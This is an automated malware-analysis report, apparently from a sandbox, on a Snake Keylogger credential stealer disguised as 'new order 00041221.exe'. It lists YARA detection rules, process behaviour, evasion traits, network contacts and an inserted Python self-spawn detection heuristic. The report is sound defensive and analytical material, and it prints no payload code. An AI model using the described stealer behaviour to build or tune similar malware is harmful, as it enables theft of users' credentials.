                    Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2

                    System Summary

                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: new order 00041221.exe, BaseTypeRequiredAttribute.cs | Large array initialization: array initializer size 620175
                    Source: initial sample | Static PE information: Filename: new order 00041221.exe
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Process Stats: CPU usage > 49%
                    Source: new order 00041221.exe, 00000001.00000002.1269553878.000000000079E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1278242473.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1271292903.0000000002851000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMML.dll2 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1271292903.00000000028AB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1277540501.0000000004E00000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMML.dll2 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000000.1238190903.0000000000338000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameJUWJ.exe2 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003A2E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000003.00000002.3708230795.00000000010F7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs new order 00041221.exe
                    Source: new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
                    Source: new order 00041221.exe | Binary or memory string: OriginalFilenameJUWJ.exe2 vs new order 00041221.exe
                    Source: new order 00041221.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
                    Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hooking
                    Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: new order 00041221.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -A.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -A.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs | Security API names: _0020.SetAccessControl
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs | Security API names: _0020.AddAccessRule
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WWoXcRNneectu4WPwU.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs | Security API names: _0020.SetAccessControl
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs | Security API names: _0020.AddAccessRule
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WWoXcRNneectu4WPwU.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@6/4
                    Source: C:\Users\user\Desktop\new order 00041221.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new order 00041221.exe.log
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Mutant created: NULL
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Mutant created: \Sessions\1\BaseNamedObjects\EcCdSAIhNcVisQpsLrNIP
                    Source: new order 00041221.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\new order 00041221.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: new order 00041221.exe, 00000003.00000002.3711414422.000000000318D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000315B000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000313D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000314D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000003180000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: new order 00041221.exeVirustotal: Detection: 41%
                    Source: new order 00041221.exeReversingLabs: Detection: 47%
                    Source: unknownProcess created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"
                    Source: C:\Users\user\Desktop\new order 00041221.exeProcess created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"Jump to behavior
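The process-creation lines above record the sample starting a second instance of its own image with an identical, argument-free command line, a pattern commonly seen when a loader prepares a child copy of itself as an injection target. The Python below is an added example and not part of the Joe Sandbox report: it runs a self-spawn heuristic over constructed process-creation events (field names modelled on Sysmon Event ID 1; the PIDs and the benign browser entries are assumptions of the example) and keeps out the usual false positive of a browser relaunching its own image with distinguishing switches.

```python
"""Triage heuristic for the process tree above: flag a process that launches a
second copy of its own image with no additional arguments, as
"new order 00041221.exe" does in the report. Added example, not Joe Sandbox
code; the events, PIDs and field names below are constructed to resemble
Sysmon Event ID 1 and are assumptions of this example."""
import ntpath
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the new process image
    command_line: str   # command line as logged


def _norm(path: str) -> str:
    # Case-insensitive, backslash-normalised comparison, as Windows compares paths.
    return ntpath.normcase(path)


def extra_args(ev: ProcEvent) -> str:
    """Return whatever follows the image path on the command line ("" if nothing)."""
    cl = ev.command_line.strip()
    base = ntpath.basename(ev.image)
    for prefix in (f'"{ev.image}"', ev.image, f'"{base}"', base):
        if cl.lower().startswith(prefix.lower()):
            return cl[len(prefix):].strip()
    return cl


def find_self_spawns(events):
    """Return (child_pid, parent_pid, image) for every child whose parent runs the
    same image and which was started without extra arguments. Browsers and some
    updaters also relaunch their own image, but they pass distinguishing switches
    (for example --type=renderer), so the no-arguments condition keeps them out.
    Treat hits as a triage lead, not proof of injection."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for child in events:
        parent = by_pid.get(child.ppid)
        if parent is None:
            continue
        if _norm(parent.image) != _norm(child.image):
            continue
        if extra_args(child):
            continue
        hits.append((child.pid, parent.pid, child.image))
    return hits


# Constructed sample log, modelled on the "Process created" lines in the report.
SAMPLE_PATH = r"C:\Users\user\Desktop\new order 00041221.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
SAMPLE_EVENTS = [
    ProcEvent(612, 400, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1000, 612, SAMPLE_PATH, f'"{SAMPLE_PATH}"'),
    ProcEvent(1164, 1000, SAMPLE_PATH, f'"{SAMPLE_PATH}"'),          # the self-spawn
    ProcEvent(2000, 612, CHROME, f'"{CHROME}"'),
    ProcEvent(2100, 2000, CHROME, f'"{CHROME}" --type=renderer'),   # benign look-alike
]

if __name__ == "__main__":
    for child_pid, parent_pid, image in find_self_spawns(SAMPLE_EVENTS):
        print(f"self-spawn: pid {child_pid} started by pid {parent_pid} ({image})")
```

On the constructed events only the sample's child (pid 1164) is reported; the Chrome renderer is skipped because its command line carries a switch.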
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: dwrite.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\new order 00041221.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: new order 00041221.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: new order 00041221.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: 1.2.new order 00041221.exe.4e00000.5.raw.unpack, -.cs | .Net Code: _0001 System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.new order 00041221.exe.4e00000.5.raw.unpack, PingPong.cs | .Net Code: Justy
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs | .Net Code: zn4PwiPIJE System.Reflection.Assembly.Load(byte[])
                    Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs | .Net Code: zn4PwiPIJE System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Code function: 1_2_00B50995 push es; retf 1_2_00B50996
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Code function: 1_2_00B50990 push es; retf 1_2_00B50992
                    Source: C:\Users\user\Desktop\new order 00041221.exe | Code function: 1_2_00B50998 push es; retf 1_2_00B5099A
                    Source: new order 00041221.exe | Static PE information: section name: .text entropy: 7.869956261157549
                    Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WEkErVgJn1PjkdRbDK.cs | High entropy of concatenated method names: 'ksnI2GS1Sg', 'VnxIHA1l58', 't0a4VAcCPY', 'oQ84QADq3w', 'eI3I7WmpKy', 'EJuIi4Zvbw', 'fmqIJplq0r', 'h5TIThviGG', 'UvbIp8eT3v', 'EsqIKrXUbo'
